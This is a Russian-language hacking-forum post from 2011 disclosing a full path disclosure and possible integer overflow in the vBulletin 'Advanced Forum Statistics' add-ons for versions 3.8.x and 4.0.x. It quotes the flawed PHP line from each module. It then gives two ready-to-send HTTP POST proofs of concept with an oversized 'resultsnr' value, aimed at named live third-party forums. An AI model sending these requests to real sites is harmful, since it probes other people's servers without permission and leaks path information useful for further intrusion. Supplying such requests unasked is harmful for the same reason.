02.11.2011, 21:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
[3.8.x] Cyb - Advanced Forum Statistics
[4.0.x] VSa - Advanced Forum Statistics
c 4 линейки название немного изменилось. был помидор, стал томат.
FULL PATH DISCLOSURE
(раскрытие путей)
Possible integer overflow
3.8.X
модуль cyb_topstats
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$resultsnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$resultsnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
4.0.X
Модуль vsa_topstats
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$vsacb_resnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$vsacb_resnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
PoC for 3.8.X:
Код:
Code:
POST /misc.php?do=cybstats HTTP/1.1
Host: brutezone.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://brutezone.ru/misc.php?do=cybstats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
securitytoken=1320250782-fda4c39ad1983a01f3b3ce9b94b7350c35099352&resultsnr=999999999999999999999999999999999999
PoC for 4.0.X:
(на 4.1.X не пробовал.)
Код:
Code:
POST /misc.php?do=vsastats HTTP/1.1
Host: www.html.by
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.html.by/misc.php?do=vsastats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
securitytoken=1320251249-9e5b6a09879833baf7af3e58fae882855e302814&vsacb_resnr=5999999999999999999999999999999999999999999999
|
|
|
|